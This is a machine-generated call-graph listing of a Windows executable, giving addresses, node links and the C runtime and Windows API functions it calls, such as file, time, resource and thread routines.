46d933 LoadResource 101782->101783 101782->101786 101784 46d948 SizeofResource 101783->101784 101783->101786 101785 46d95c LockResource 101784->101785 101784->101786 101785->101786 101786->101662 101788 434ef4 101787->101788 101789 46d9ab 101787->101789 101793 45584d 101788->101793 101791 434f02 101791->101672 101792->101662 101794 455859 __close 101793->101794 101795 45586b 101794->101795 101797 455891 101794->101797 101806 458b28 58 API calls __getptd_noexit 101795->101806 101808 456c11 101797->101808 101798 455870 101807 458db6 9 API calls __wopenfile 101798->101807 101803 4558a6 101815 4558c8 LeaveCriticalSection LeaveCriticalSection __wfsopen 101803->101815 101805 45587b __close 101805->101791 101806->101798 101807->101805 101809 456c21 101808->101809 101810 456c43 EnterCriticalSection 101808->101810 101809->101810 101811 456c29 101809->101811 101812 455897 101810->101812 101813 459c0b __lock 58 API calls 101811->101813 101814 4557be 83 API calls 4 library calls 101812->101814 101813->101812 101814->101803 101815->101805 101819 4555fd 101816->101819 101818 434f2e 101818->101681 101820 455609 __close 101819->101820 101821 45564c 101820->101821 101822 45561f _memset 101820->101822 101823 455644 __close 101820->101823 101824 456c11 __lock_file 59 API calls 101821->101824 101832 458b28 58 API calls __getptd_noexit 101822->101832 101823->101818 101826 455652 101824->101826 101834 45541d 72 API calls 6 library calls 101826->101834 101828 455639 101833 458db6 9 API calls __wopenfile 101828->101833 101829 455668 101835 455686 LeaveCriticalSection LeaveCriticalSection __wfsopen 101829->101835 101832->101828 101833->101823 101834->101829 101835->101823 101839 45520a GetSystemTimeAsFileTime 101836->101839 101838 498f6e 101838->101683 101840 455238 __aulldiv 101839->101840 101840->101838 101842 455c6c __close 101841->101842 101843 455c93 101842->101843 101844 455c7e 101842->101844 101845 456c11 __lock_file 59 API calls 101843->101845 101855 458b28 58 API calls __getptd_noexit 101844->101855 101847 455c99 101845->101847 101857 4558d0 67 API calls 6 library calls 101847->101857 101848 455c83 101856 458db6 9 API calls __wopenfile 101848->101856 101851 455ca4 101858 455cc4 LeaveCriticalSection LeaveCriticalSection __wfsopen 101851->101858 101852 455c8e __close 101852->101688 101854 455cb6 101854->101852 101855->101848 101856->101852 101857->101851 101858->101854 101860 4378b7 101859->101860 101861 43785a 101859->101861 101862 437d2c 59 API calls 101860->101862 101861->101860 101863 437865 101861->101863 101868 437888 _memmove 101862->101868 101864 437880 101863->101864 101865 46eb09 101863->101865 101877 437f27 59 API calls Mailbox 101864->101877 101867 438029 59 API calls 101865->101867 101869 46eb13 101867->101869 101868->101493 101870 450db6 Mailbox 59 API calls 101869->101870 101871 46eb33 101870->101871 101873 437da6 101872->101873 101875 437d99 101872->101875 101874 450db6 Mailbox 59 API calls 101873->101874 101874->101875 101875->101486 101876->101514 101877->101868 101878->101560 101879->101562 101880->101613 101882 45486f __close 101881->101882 101883 4548a5 101882->101883 101884 45488d 101882->101884 101885 45489d __close 101882->101885 101886 456c11 __lock_file 59 API calls 101883->101886 101931 458b28 58 API calls __getptd_noexit 101884->101931 101885->101624 101888 4548ab 101886->101888 101919 45470a 101888->101919 101889 454892 101932 458db6 9 API calls __wopenfile 101889->101932 101895 4553b2 __close 101894->101895 101896 4553c6 101895->101896 101898 4553de 101895->101898 102110 458b28 58 API calls __getptd_noexit 101896->102110 101900 456c11 __lock_file 59 API calls 101898->101900 101903 4553d6 __close 101898->101903 101899 4553cb 102111 458db6 9 API calls __wopenfile 101899->102111 101902 4553f0 101900->101902 102094 45533a 101902->102094 101903->101617 101908 4998c8 SetFileTime CloseHandle 101907->101908 101909 4998de 101907->101909 101908->101909 101909->101593 101914 499748 __tzset_nolock _wcscmp 101910->101914 101911 499210 101911->101593 101916 4540fb 58 API calls __wsplitpath_helper 101911->101916 101912 434f0b 74 API calls 101912->101914 101913 499109 GetSystemTimeAsFileTime 101913->101914 101914->101911 101914->101912 101914->101913 101915 434ee5 85 API calls 101914->101915 101915->101914 101916->101596 101917->101601 101918->101629 101920 454737 101919->101920 101922 454719 101919->101922 101933 4548dd LeaveCriticalSection LeaveCriticalSection __wfsopen 101920->101933 101921 454727 101969 458b28 58 API calls __getptd_noexit 101921->101969 101922->101920 101922->101921 101930 454751 _memmove 101922->101930 101924 45472c 101970 458db6 9 API calls __wopenfile 101924->101970 101930->101920 101934 4546e6 101930->101934 101941 45d886 101930->101941 101971 454a3d 101930->101971 101977 45ae1e 78 API calls 7 library calls 101930->101977 101931->101889 101932->101885 101933->101885 101935 454705 101934->101935 101936 4546f0 101934->101936 101935->101930 101978 458b28 58 API calls __getptd_noexit 101936->101978 101938 4546f5 101979 458db6 9 API calls __wopenfile 101938->101979 101940 454700 101940->101930 101942 45d892 __close 101941->101942 101943 45d89f 101942->101943 101946 45d8b6 101942->101946 102053 458af4 58 API calls __getptd_noexit 101943->102053 101945 45d955 102059 458af4 58 API calls __getptd_noexit 101945->102059 101946->101945 101948 45d8ca 101946->101948 101947 45d8a4 102054 458b28 58 API calls __getptd_noexit 101947->102054 101951 45d8f2 101948->101951 101952 45d8e8 101948->101952 101980 45d206 101951->101980 102055 458af4 58 API calls __getptd_noexit 101952->102055 101953 45d8ed 102060 458b28 58 API calls __getptd_noexit 101953->102060 101956 45d8f8 101958 45d91e 101956->101958 101959 45d90b 101956->101959 102056 458b28 58 API calls __getptd_noexit 101958->102056 101989 45d975 101959->101989 101960 45d961 102061 458db6 9 API calls __wopenfile 101960->102061 101961 45d8ab __close 101961->101930 101966 45d923 101969->101924 101970->101920 101972 454a74 101971->101972 101973 454a50 101971->101973 101972->101930 101973->101972 101974 4546e6 __flush 58 API calls 101973->101974 101975 454a6d 101974->101975 101976 45d886 __write 78 API calls 101975->101976 101976->101972 101977->101930 101978->101938 101979->101940 101981 45d212 __close 101980->101981 101982 45d261 EnterCriticalSection 101981->101982 101984 459c0b __lock 58 API calls 101981->101984 101983 45d287 __close 101982->101983 101983->101956 101985 45d237 101984->101985 101988 45d24f 101985->101988 102062 459e2b InitializeCriticalSectionAndSpinCount 101985->102062 102063 45d28b LeaveCriticalSection _doexit 101988->102063 101990 45d982 __write_nolock 101989->101990 102053->101947 102054->101961 102055->101953 102056->101966 102059->101953 102060->101960 102061->101961 102062->101988 102063->101982 102095 45535d 102094->102095 102096 455349 102094->102096 102099 454a3d __flush 78 API calls 102095->102099 102103 455359 102095->102103 102143 458b28 58 API calls __getptd_noexit 102096->102143 102098 45534e 102144 458db6 9 API calls __wopenfile 102098->102144 102100 455369 102099->102100 102113 460b77 102100->102113 102112 455415 LeaveCriticalSection LeaveCriticalSection __wfsopen 102103->102112 102105 4546e6 __flush 58 API calls 102106 455377 102105->102106 102117 460a02 102106->102117 102110->101899 102111->101903 102112->101903 102114 455371 102113->102114 102115 460b84 102113->102115 102114->102105 102115->102114 102116 452d55 _free 58 API calls 102115->102116 102116->102114 102118 460a0e __close 102117->102118 102119 460a32 102118->102119 102120 460a1b 102118->102120 102122 460abd 102119->102122 102124 460a42 102119->102124 102160 458af4 58 API calls __getptd_noexit 102120->102160 102165 458af4 58 API calls __getptd_noexit 102122->102165 102123 460a20 102161 458b28 58 API calls __getptd_noexit 102123->102161 102127 460a60 102124->102127 102128 460a6a 102124->102128 102162 458af4 58 API calls __getptd_noexit 102127->102162 102132 45d206 ___lock_fhandle 59 API calls 102128->102132 102129 460a65 102166 458b28 58 API calls __getptd_noexit 102129->102166 102130 460a27 __close 102134 460a70 102132->102134 102143->102098 102144->102103 102160->102123 102161->102130 102162->102129 102165->102129 102184 437a16 59 API calls 102183->102184 102204 436265 102184->102204 102185 43646a 102211 43750f 102185->102211 102187 436484 Mailbox 102187->101393 102190 43750f 59 API calls 102190->102204 102191 46dff6 102221 48f8aa 91 API calls 4 library calls 102191->102221 102195 437d8c 59 API calls 102195->102204 102196 46e004 102197 43750f 59 API calls 102196->102197 102199 46e01a 102197->102199 102198 436799 _memmove 102222 48f8aa 91 API calls 4 library calls 102198->102222 102199->102187 102200 46df92 102201 438029 59 API calls 102200->102201 102203 46df9d 102201->102203 102207 450db6 Mailbox 59 API calls 102203->102207 102204->102185 102204->102190 102204->102191 102204->102195 102204->102198 102204->102200 102205 437e4f 59 API calls 102204->102205 102209 435f6c 60 API calls 102204->102209 102210 435d41 59 API calls Mailbox 102204->102210 102219 435e72 60 API calls 102204->102219 102220 437924 59 API calls 2 library calls 102204->102220 102206 43643b CharUpperBuffW 102205->102206 102206->102204 102207->102198 102208->101397 102209->102204 102210->102204 102212 437522 _memmove 102211->102212 102213 4375af 102211->102213 102214 450db6 Mailbox 59 API calls 102212->102214 102215 450db6 Mailbox 59 API calls 102213->102215 102216 437529 102214->102216 102215->102212 102217 437552 102216->102217 102218 450db6 Mailbox 59 API calls 102216->102218 102217->102187 102218->102217 102219->102204 102220->102204 102221->102196 102222->102187 102224 493c3e 102223->102224 102225 494475 FindFirstFileW 102223->102225 102224->101167 102225->102224 102226 49448a FindClose 102225->102226 102226->102224 102227->101410 102228->101408 102229->101424 102230->101420 102231->101429 102232->101435 102233->101437 102234->101441 102235->101184 102236->101186 102238 43b91a 102237->102238 102242 43bac7 102237->102242 102239 43bf81 102238->102239 102238->102242 102243 43baab 102238->102243 102244 43b9fc 102238->102244 102239->102243 102262 4394dc 59 API calls wcstoxq 102239->102262 102240 43bb46 102240->102243 102246 471361 102240->102246 102250 43ba8b Mailbox 102240->102250 102259 486e8f 59 API calls 102240->102259 102242->102239 102242->102240 102242->102243 102242->102250 102243->101091 102244->102240 102244->102243 102247 43ba38 102244->102247 102246->102243 102260 453d46 59 API calls __wtof_l 102246->102260 102247->102243 102247->102250 102252 4711b4 102247->102252 102250->101091 102250->102243 102250->102246 102261 438cd4 59 API calls Mailbox 102250->102261 102252->102243 102258 453d46 59 API calls __wtof_l 102252->102258 102253->101091 102254->101086 102255->101092 102256->101080 102257->101092 102258->102252 102259->102250 102260->102243 102261->102250 102262->102243 102263->101115 102264 457c56 102265 457c62 __close 102264->102265 102301 459e08 GetStartupInfoW 102265->102301 102267 457c67 102303 458b7c GetProcessHeap 102267->102303 102269 457cbf 102270 457cca 102269->102270 102386 457da6 58 API calls 3 library calls 102269->102386 102304 459ae6 102270->102304 102273 457cd0 102274 457cdb __RTC_Initialize 102273->102274 102387 457da6 58 API calls 3 library calls 102273->102387 102325 45d5d2 102274->102325 102277 457cea 102278 457cf6 GetCommandLineW 102277->102278 102388 457da6 58 API calls 3 library calls 102277->102388 102344 464f23 GetEnvironmentStringsW 102278->102344 102281 457cf5 102281->102278 102284 457d10 102285 457d1b 102284->102285 102389 4530b5 58 API calls 3 library calls 102284->102389 102354 464d58 102285->102354 102288 457d21 102289 457d2c 102288->102289 102390 4530b5 58 API calls 3 library calls 102288->102390 102368 4530ef 102289->102368 102292 457d34 102293 457d3f __wwincmdln 102292->102293 102391 4530b5 58 API calls 3 library calls 102292->102391 102374 4347d0 102293->102374 102296 457d53 102297 457d62 102296->102297 102392 453358 58 API calls _doexit 102296->102392 102393 4530e0 58 API calls _doexit 102297->102393 102300 457d67 __close 102302 459e1e 102301->102302 102302->102267 102303->102269 102394 453187 36 API calls 2 library calls 102304->102394 102306 459aeb 102395 459d3c InitializeCriticalSectionAndSpinCount __mtinitlocks 102306->102395 102308 459af0 102309 459af4 102308->102309 102397 459d8a TlsAlloc 102308->102397 102396 459b5c 61 API calls 2 library calls 102309->102396 102312 459af9 102312->102273 102313 459b06 102313->102309 102314 459b11 102313->102314 102398 4587d5 102314->102398 102317 459b53 102406 459b5c 61 API calls 2 library calls 102317->102406 102320 459b58 102320->102273 102321 459b32 102321->102317 102322 459b38 102321->102322 102405 459a33 58 API calls 4 library calls 102322->102405 102324 459b40 GetCurrentThreadId 102324->102273 102326 45d5de __close 102325->102326 102327 459c0b __lock 58 API calls 102326->102327 102328 45d5e5 102327->102328 102329 4587d5 __calloc_crt 58 API calls 102328->102329 102331 45d5f6 102329->102331 102330 45d661 GetStartupInfoW 102333 45d7a5 102330->102333 102336 45d676 102330->102336 102331->102330 102332 45d601 __close @_EH4_CallFilterFunc@8 102331->102332 102332->102277 102334 45d86d 102333->102334 102338 45d7f2 GetStdHandle 102333->102338 102340 45d805 GetFileType 102333->102340 102419 459e2b InitializeCriticalSectionAndSpinCount 102333->102419 102420 45d87d LeaveCriticalSection _doexit 102334->102420 102336->102333 102337 4587d5 __calloc_crt 58 API calls 102336->102337 102339 45d6c4 102336->102339 102337->102336 102338->102333 102339->102333 102341 45d6f8 GetFileType 102339->102341 102418 459e2b InitializeCriticalSectionAndSpinCount 102339->102418 102340->102333 102341->102339 102345 457d06 102344->102345 102346 464f34 102344->102346 102350 464b1b GetModuleFileNameW 102345->102350 102421 45881d 58 API calls 2 library calls 102346->102421 102348 464f5a _memmove 102349 464f70 FreeEnvironmentStringsW 102348->102349 102349->102345 102351 464b4f _wparse_cmdline 102350->102351 102353 464b8f _wparse_cmdline 102351->102353 102422 45881d 58 API calls 2 library calls 102351->102422 102353->102284 102355 464d71 __wsetenvp 102354->102355 102356 464d69 102354->102356 102357 4587d5 __calloc_crt 58 API calls 102355->102357 102356->102288 102362 464d9a __wsetenvp 102357->102362 102358 464df1 102359 452d55 _free 58 API calls 102358->102359 102359->102356 102360 4587d5 __calloc_crt 58 API calls 102360->102362 102361 464e16 102363 452d55 _free 58 API calls 102361->102363 102362->102356 102362->102358 102362->102360 102362->102361 102365 464e2d 102362->102365 102423 464607 58 API calls __wopenfile 102362->102423 102363->102356 102424 458dc6 IsProcessorFeaturePresent 102365->102424 102367 464e39 102367->102288 102369 4530fb __IsNonwritableInCurrentImage 102368->102369 102439 45a4d1 102369->102439 102371 453119 __initterm_e 102372 452d40 __cinit 67 API calls 102371->102372 102373 453138 __cinit __IsNonwritableInCurrentImage 102371->102373 102372->102373 102373->102292 102375 4347ea 102374->102375 102385 434889 102374->102385 102376 434824 IsThemeActive 102375->102376 102442 45336c 102376->102442 102380 434850 102454 4348fd SystemParametersInfoW SystemParametersInfoW 102380->102454 102382 43485c 102455 433b3a 102382->102455 102384 434864 SystemParametersInfoW 102384->102385 102385->102296 102386->102270 102387->102274 102388->102281 102392->102297 102393->102300 102394->102306 102395->102308 102396->102312 102397->102313 102401 4587dc 102398->102401 102400 458817 102400->102317 102404 459de6 TlsSetValue 102400->102404 102401->102400 102403 4587fa 102401->102403 102407 4651f6 102401->102407 102403->102400 102403->102401 102415 45a132 Sleep 102403->102415 102404->102321 102405->102324 102406->102320 102408 465201 102407->102408 102409 46521c 102407->102409 102408->102409 102410 46520d 102408->102410 102412 46522c HeapAlloc 102409->102412 102414 465212 102409->102414 102417 4533a1 DecodePointer 102409->102417 102416 458b28 58 API calls __getptd_noexit 102410->102416 102412->102409 102412->102414 102414->102401 102415->102403 102416->102414 102417->102409 102418->102339 102419->102333 102420->102332 102421->102348 102422->102353 102423->102362 102425 458dd1 102424->102425 102430 458c59 102425->102430 102429 458dec 102429->102367 102431 458c73 _memset __call_reportfault 102430->102431 102432 458c93 IsDebuggerPresent 102431->102432 102438 45a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 102432->102438 102434 45c5f6 __except1 6 API calls 102436 458d7a 102434->102436 102435 458d57 __call_reportfault 102435->102434 102437 45a140 GetCurrentProcess TerminateProcess 102436->102437 102437->102429 102438->102435 102440 45a4d4 EncodePointer 102439->102440 102440->102440 102441 45a4ee 102440->102441 102441->102371 102443 459c0b __lock 58 API calls 102442->102443 102444 453377 DecodePointer EncodePointer 102443->102444 102507 459d75 LeaveCriticalSection 102444->102507 102446 434849 102447 4533d4 102446->102447 102448 4533de 102447->102448 102449 4533f8 102447->102449 102448->102449 102508 458b28 58 API calls __getptd_noexit 102448->102508 102449->102380 102451 4533e8 102509 458db6 9 API calls __wopenfile 102451->102509 102453 4533f3 102453->102380 102454->102382 102456 433b47 __write_nolock 102455->102456 102457 437667 59 API calls 102456->102457 102458 433b51 GetCurrentDirectoryW 102457->102458 102510 433766 102458->102510 102460 433b7a IsDebuggerPresent 102461 46d272 MessageBoxA 102460->102461 102462 433b88 102460->102462 102465 46d28c 102461->102465 102463 433c61 102462->102463 102462->102465 102466 433ba5 102462->102466 102464 433c68 SetCurrentDirectoryW 102463->102464 102467 433c75 Mailbox 102464->102467 102632 437213 59 API calls Mailbox 102465->102632 102591 437285 102466->102591 102467->102384 102470 46d29c 102475 46d2b2 SetCurrentDirectoryW 102470->102475 102475->102467 102507->102446 102508->102451 102509->102453 102511 437667 59 API calls 102510->102511 102512 43377c 102511->102512 102641 433d31 102512->102641 102514 43379a 102515 434706 61 API calls 102514->102515 102516 4337ae 102515->102516 102517 437de1 59 API calls 102516->102517 102518 4337bb 102517->102518 102519 434ddd 136 API calls 102518->102519 102520 4337d4 102519->102520 102521 46d173 102520->102521 102522 4337dc Mailbox 102520->102522 102694 49955b 102521->102694 102526 438047 59 API calls 102522->102526 102525 46d192 102528 452d55 _free 58 API calls 102525->102528 102529 4337ef 102526->102529 102527 434e4a 84 API calls 102527->102525 102530 46d19f 102528->102530 102655 43928a 102529->102655 102532 434e4a 84 API calls 102530->102532 102534 46d1a8 102532->102534 102538 433ed0 59 API calls 102534->102538 102535 437de1 59 API calls 102536 433808 102535->102536 102537 4384c0 69 API calls 102536->102537 102539 43381a Mailbox 102537->102539 102540 46d1c3 102538->102540 102541 437de1 59 API calls 102539->102541 102542 433ed0 59 API calls 102540->102542 102543 433840 102541->102543 102544 46d1df 102542->102544 102545 4384c0 69 API calls 102543->102545 102546 434706 61 API calls 102544->102546 102548 43384f Mailbox 102545->102548 102547 46d204 102546->102547 102549 433ed0 59 API calls 102547->102549 102551 437667 59 API calls 102548->102551 102550 46d210 102549->102550 102552 438047 59 API calls 102550->102552 102553 43386d 102551->102553 102554 46d21e 102552->102554 102658 433ed0 102553->102658 102556 433ed0 59 API calls 102554->102556 102561 46d22d 102556->102561 102559 433887 102559->102534 102560 433891 102559->102560 102562 452efd _W_store_winword 60 API calls 102560->102562 102564 438047 59 API calls 102561->102564 102563 43389c 102562->102563 102563->102540 102565 4338a6 102563->102565 102566 46d24f 102564->102566 102567 452efd _W_store_winword 60 API calls 102565->102567 102568 433ed0 59 API calls 102566->102568 102569 4338b1 102567->102569 102570 46d25c 102568->102570 102569->102544 102571 4338bb 102569->102571 102570->102570 102572 452efd _W_store_winword 60 API calls 102571->102572 102573 4338c6 102572->102573 102573->102561 102574 433907 102573->102574 102576 433ed0 59 API calls 102573->102576 102574->102561 102575 433914 102574->102575 102674 4392ce 102575->102674 102578 4338ea 102576->102578 102580 438047 59 API calls 102578->102580 102582 4338f8 102580->102582 102584 433ed0 59 API calls 102582->102584 102584->102574 102586 43928a 59 API calls 102588 43394f 102586->102588 102587 438ee0 60 API calls 102587->102588 102588->102586 102588->102587 102589 433ed0 59 API calls 102588->102589 102590 433995 Mailbox 102588->102590 102589->102588 102590->102460 102592 437292 __write_nolock 102591->102592 102593 46ea22 _memset 102592->102593 102594 4372ab 102592->102594 102596 46ea3e GetOpenFileNameW 102593->102596 102751 434750 102594->102751 102599 46ea8d 102596->102599 102601 437bcc 59 API calls 102599->102601 102603 46eaa2 102601->102603 102603->102603 102604 4372c9 102779 43686a 102604->102779 102632->102470 102642 433d3e __write_nolock 102641->102642 102643 437bcc 59 API calls 102642->102643 102647 433ea4 Mailbox 102642->102647 102645 433d70 102643->102645 102644 4379f2 59 API calls 102644->102645 102645->102644 102654 433da6 Mailbox 102645->102654 102646 433e77 102646->102647 102648 437de1 59 API calls 102646->102648 102647->102514 102649 433e98 102648->102649 102651 433f74 59 API calls 102649->102651 102650 437de1 59 API calls 102650->102654 102651->102647 102652 4379f2 59 API calls 102652->102654 102654->102646 102654->102647 102654->102650 102654->102652 102729 433f74 102654->102729 102656 450db6 Mailbox 59 API calls 102655->102656 102657 4337fb 102656->102657 102657->102535 102659 433ef3 102658->102659 102660 433eda 102658->102660 102661 437bcc 59 API calls 102659->102661 102662 438047 59 API calls 102660->102662 102663 433879 102661->102663 102662->102663 102664 452efd 102663->102664 102665 452f7e 102664->102665 102666 452f09 102664->102666 102737 452f90 60 API calls 3 library calls 102665->102737 102673 452f2e 102666->102673 102735 458b28 58 API calls __getptd_noexit 102666->102735 102669 452f8b 102669->102559 102670 452f15 102736 458db6 9 API calls __wopenfile 102670->102736 102672 452f20 102672->102559 102673->102559 102675 4392d6 102674->102675 102676 450db6 Mailbox 59 API calls 102675->102676 102677 4392e4 102676->102677 102678 433924 102677->102678 102738 4391fc 59 API calls Mailbox 102677->102738 102680 439050 102678->102680 102739 439160 102680->102739 102682 43905f 102683 450db6 Mailbox 59 API calls 102682->102683 102684 433932 102682->102684 102683->102684 102685 438ee0 102684->102685 102686 46f17c 102685->102686 102688 438ef7 102685->102688 102686->102688 102749 438bdb 59 API calls Mailbox 102686->102749 102689 439040 102688->102689 102690 438ff8 102688->102690 102693 438fff 102688->102693 102748 439d3c 60 API calls Mailbox 102689->102748 102692 450db6 Mailbox 59 API calls 102690->102692 102692->102693 102693->102588 102695 434ee5 85 API calls 102694->102695 102696 4995ca 102695->102696 102697 499734 96 API calls 102696->102697 102698 4995dc 102697->102698 102699 434f0b 74 API calls 102698->102699 102726 46d186 102698->102726 102700 4995f7 102699->102700 102701 434f0b 74 API calls 102700->102701 102702 499607 102701->102702 102703 434f0b 74 API calls 102702->102703 102704 499622 102703->102704 102705 434f0b 74 API calls 102704->102705 102706 49963d 102705->102706 102707 434ee5 85 API calls 102706->102707 102708 499654 102707->102708 102709 45571c __crtCompareStringA_stat 58 API calls 102708->102709 102710 49965b 102709->102710 102711 45571c __crtCompareStringA_stat 58 API calls 102710->102711 102712 499665 102711->102712 102713 434f0b 74 API calls 102712->102713 102714 499679 102713->102714 102715 499109 GetSystemTimeAsFileTime 102714->102715 102716 49968c 102715->102716 102717 4996a1 102716->102717 102718 4996b6 102716->102718 102721 452d55 _free 58 API calls 102717->102721 102719 49971b 102718->102719 102720 4996bc 102718->102720 102723 452d55 _free 58 API calls 102719->102723 102750 498b06 116 API calls __fcloseall 102720->102750 102724 4996a7 102721->102724 102723->102726 102727 452d55 _free 58 API calls 102724->102727 102725 499713 102728 452d55 _free 58 API calls 102725->102728 102726->102525 102726->102527 102727->102726 102728->102726 102730 433f82 102729->102730 102731 433fa4 _memmove 102729->102731 102734 450db6 Mailbox 59 API calls 102730->102734 102732 450db6 Mailbox 59 API calls 102731->102732 102733 433fb8 102732->102733 102733->102654 102734->102731 102735->102670 102736->102672 102737->102669 102738->102678 102740 439169 Mailbox 102739->102740 102741 46f19f 102740->102741 102746 439173 102740->102746 102742 450db6 Mailbox 59 API calls 102741->102742 102743 46f1ab 102742->102743 102744 43917a 102744->102682 102746->102744 102747 439c90 59 API calls Mailbox 102746->102747 102747->102746 102748->102693 102749->102688 102750->102725 102813 461940 102751->102813 102754 434799 102757 437d8c 59 API calls 102754->102757 102755 43477c 102756 437bcc 59 API calls 102755->102756 102758 434788 102756->102758 102757->102758 102815 437726 102758->102815 102761 450791 102762 461940 __write_nolock 102761->102762 102763 45079e GetLongPathNameW 102762->102763 102764 437bcc 59 API calls 102763->102764 102765 4372bd 102764->102765 102766 43700b 102765->102766 102767 437667 59 API calls 102766->102767 102768 43701d 102767->102768 102769 434750 60 API calls 102768->102769 102770 437028 102769->102770 102771 437033 102770->102771 102772 46e885 102770->102772 102773 433f74 59 API calls 102771->102773 102777 46e89f 102772->102777 102825 437908 61 API calls 102772->102825 102775 43703f 102773->102775 102819 4334c2 102775->102819 102778 437052 Mailbox 102778->102604 102780 434ddd 136 API calls 102779->102780 102781 43688f 102780->102781 102782 46e031 102781->102782 102783 434ddd 136 API calls 102781->102783 102784 49955b 122 API calls 102782->102784 102785 4368a3 102783->102785 102786 46e046 102784->102786 102785->102782 102787 4368ab 102785->102787 102788 46e067 102786->102788 102789 46e04a 102786->102789 102791 46e052 102787->102791 102792 4368b7 102787->102792 102790 450db6 Mailbox 59 API calls 102788->102790 102793 434e4a 84 API calls 102789->102793 102812 46e0ac Mailbox 102790->102812 102925 4942f8 90 API calls _wprintf 102791->102925 102826 436a8c 102792->102826 102793->102791 102797 46e060 102797->102788 102798 46e260 102799 452d55 _free 58 API calls 102798->102799 102800 46e268 102799->102800 102801 434e4a 84 API calls 102800->102801 102806 46e271 102801->102806 102802 43750f 59 API calls 102802->102812 102805 452d55 _free 58 API calls 102805->102806 102806->102805 102807 434e4a 84 API calls 102806->102807 102929 48f7a1 89 API calls 4 library calls 102806->102929 102807->102806 102809 437de1 59 API calls 102809->102812 102812->102798 102812->102802 102812->102806 102812->102809 102919 43735d 102812->102919 102926 48f73d 59 API calls 2 library calls 102812->102926 102927 48f65e 61 API calls 2 library calls 102812->102927 102928 49737f 59 API calls Mailbox 102812->102928 102814 43475d GetFullPathNameW 102813->102814 102814->102754 102814->102755 102816 437734 102815->102816 102817 437d2c 59 API calls 102816->102817 102818 434794 102817->102818 102818->102761 102821 4334d4 102819->102821 102824 4334f3 _memmove 102819->102824 102820 450db6 Mailbox 59 API calls 102822 43350a 102820->102822 102823 450db6 Mailbox 59 API calls 102821->102823 102822->102778 102823->102824 102824->102820 102825->102772 102827 436ab5 102826->102827 102828 46e41e 102826->102828 102935 4357a6 60 API calls Mailbox 102827->102935 102951 48f7a1 89 API calls 4 library calls 102828->102951 102831 436ad7 102936 4357f6 67 API calls 102831->102936 102832 46e431 102952 48f7a1 89 API calls 4 library calls 102832->102952 102834 436aec 102834->102832 102835 436af4 102834->102835 102837 437667 59 API calls 102835->102837 102839 436b00 102837->102839 102838 46e44d 102867 436b61 102838->102867 102937 450957 60 API calls __write_nolock 102839->102937 102841 46e460 102844 435c6f CloseHandle 102841->102844 102842 436b6f 102845 437667 59 API calls 102842->102845 102843 436b0c 102846 437667 59 API calls 102843->102846 102847 46e46c 102844->102847 102848 436b78 102845->102848 102849 436b18 102846->102849 102850 434ddd 136 API calls 102847->102850 102851 437667 59 API calls 102848->102851 102852 434750 60 API calls 102849->102852 102854 46e488 102850->102854 102855 436b81 102851->102855 102853 436b26 102852->102853 102938 435850 ReadFile SetFilePointerEx 102853->102938 102857 46e4b1 102854->102857 102860 49955b 122 API calls 102854->102860 102858 43459b 59 API calls 102855->102858 102953 48f7a1 89 API calls 4 library calls 102857->102953 102861 436b98 102858->102861 102859 436b52 102939 435aee SetFilePointerEx SetFilePointerEx 102859->102939 102864 46e4a4 102860->102864 102865 437b2e 59 API calls 102861->102865 102868 46e4ac 102864->102868 102869 46e4cd 102864->102869 102870 436ba9 SetCurrentDirectoryW 102865->102870 102866 46e4c8 102897 436d0c Mailbox 102866->102897 102867->102841 102867->102842 102872 434e4a 84 API calls 102868->102872 102871 434e4a 84 API calls 102869->102871 102875 436bbc Mailbox 102870->102875 102873 46e4d2 102871->102873 102872->102857 102874 450db6 Mailbox 59 API calls 102873->102874 102881 46e506 102874->102881 102877 450db6 Mailbox 59 API calls 102875->102877 102879 436bcf 102877->102879 102878 433bbb 102878->102463 102880 43522e 59 API calls 102879->102880 102908 436bda Mailbox __wsetenvp 102880->102908 102882 43750f 59 API calls 102881->102882 102916 46e54f Mailbox 102882->102916 102883 436ce7 102886 46e740 102895 46e7d9 102930 4357d4 102897->102930 102899 43750f 59 API calls 102899->102916 102902 46e7d1 102905 437de1 59 API calls 102905->102908 102908->102883 102908->102895 102908->102902 102908->102905 102940 43586d 67 API calls _wcscpy 102908->102940 102941 436f5d GetStringTypeW 102908->102941 102942 436ecc 60 API calls __wcsnicmp 102908->102942 102943 436faa GetStringTypeW __wsetenvp 102908->102943 102944 45363d GetStringTypeW _iswctype 102908->102944 102909 437de1 59 API calls 102909->102916 102913 46e792 102916->102886 102916->102899 102916->102909 102916->102913 102954 48f73d 59 API calls 2 library calls 102916->102954 102955 48f65e 61 API calls 2 library calls 102916->102955 102956 49737f 59 API calls Mailbox 102916->102956 102957 437213 59 API calls Mailbox 102916->102957 102920 437370 102919->102920 102923 43741e 102919->102923 102922 450db6 Mailbox 59 API calls 102920->102922 102924 4373a2 102920->102924 102921 450db6 59 API calls Mailbox 102921->102924 102922->102924 102923->102812 102924->102921 102924->102923 102925->102797 102926->102812 102927->102812 102928->102812 102929->102806 102931 435c6f CloseHandle 102930->102931 102932 4357dc Mailbox 102931->102932 102933 435c6f CloseHandle 102932->102933 102934 4357eb 102933->102934 102934->102878 102935->102831 102936->102834 102937->102843 102938->102859 102939->102867 102940->102908 102941->102908 102942->102908 102943->102908 102944->102908 102951->102832 102952->102838 102953->102866 102954->102916 102955->102916 102956->102916 102957->102916 102979 498d0d 102980 498d1a 102979->102980 102982 498d20 102979->102982 102981 452d55 _free 58 API calls 102980->102981 102981->102982 102983 498d31 102982->102983 102985 452d55 _free 58 API calls 102982->102985 102984 498d43 102983->102984 102986 452d55 _free 58 API calls 102983->102986 102985->102983 102986->102984 102987 431066 102992 43f76f 102987->102992 102989 43106c 102990 452d40 __cinit 67 API calls 102989->102990 102991 431076 102990->102991 102993 43f790 102992->102993 103025 44ff03 102993->103025 102997 43f7d7 102998 437667 59 API calls 102997->102998 102999 43f7e1 102998->102999 103000 437667 59 API calls 102999->103000 103001 43f7eb 103000->103001 103002 437667 59 API calls 103001->103002 103003 43f7f5 103002->103003 103004 437667 59 API calls 103003->103004 103005 43f833 103004->103005 103006 437667 59 API calls 103005->103006 103007 43f8fe 103006->103007 103035 445f87 103007->103035 103011 43f930 103012 437667 59 API calls 103011->103012 103013 43f93a 103012->103013 103063 44fd9e 103013->103063 103015 43f981 103016 43f991 GetStdHandle 103015->103016 103017 4745ab 103016->103017 103018 43f9dd 103016->103018 103017->103018 103020 4745b4 103017->103020 103019 43f9e5 OleInitialize 103018->103019 103019->102989 103070 496b38 64 API calls Mailbox 103020->103070 103022 4745bb 103071 497207 CreateThread 103022->103071 103024 4745c7 CloseHandle 103024->103019 103072 44ffdc 